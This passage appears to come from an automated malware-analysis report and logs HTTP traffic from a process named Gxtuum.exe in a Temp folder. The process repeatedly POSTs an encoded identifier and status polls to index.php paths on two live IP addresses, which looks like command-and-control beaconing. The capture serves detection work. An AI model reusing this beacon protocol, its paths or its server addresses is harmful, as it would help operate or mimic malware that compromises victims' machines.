                                                              Date: Fri, 13 Dec 2024 14:47:48 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.449781185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:50.595118999 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:51.956243992 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:51 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.449782185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:50.609204054 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:51.970979929 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:51 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.449783185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:53.744865894 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:55.049388885 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:54 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.449784185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:53.744990110 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:55.064470053 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:54 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              48192.168.2.449785185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:56.763964891 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:58.114767075 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:57 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              49192.168.2.449786185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:56.764127970 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:58.126125097 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:57 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              50192.168.2.449788185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:59.863554001 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:01.203928947 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:00 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              51192.168.2.449789185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:59.895382881 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:01.236268044 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:00 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              52192.168.2.449791185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:02.827611923 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:04.193331957 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:03 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              53192.168.2.449792185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:02.858550072 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:04.221220970 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:03 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              54192.168.2.449803185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:05.943409920 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:07.283026934 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:06 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              55192.168.2.449804185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:05.969510078 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:07.314804077 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:06 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              56192.168.2.449810185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:08.906168938 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:10.268330097 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:09 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              57192.168.2.449811185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:08.952997923 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:10.289942980 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:09 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              58192.168.2.449817185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:12.017656088 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:13.361048937 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:12 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              59192.168.2.449818185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:12.032008886 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:13.377300978 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:12 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              60192.168.2.449829185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:14.985713005 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:16.362961054 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:15 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              61192.168.2.449830185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:15.000685930 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:16.362895012 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:15 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              62192.168.2.449836185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:18.112462997 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:19.447086096 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:18 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              63192.168.2.449837185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:18.113078117 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:19.454444885 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:18 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              64192.168.2.449846185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:21.079731941 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:22.439553976 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:21 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
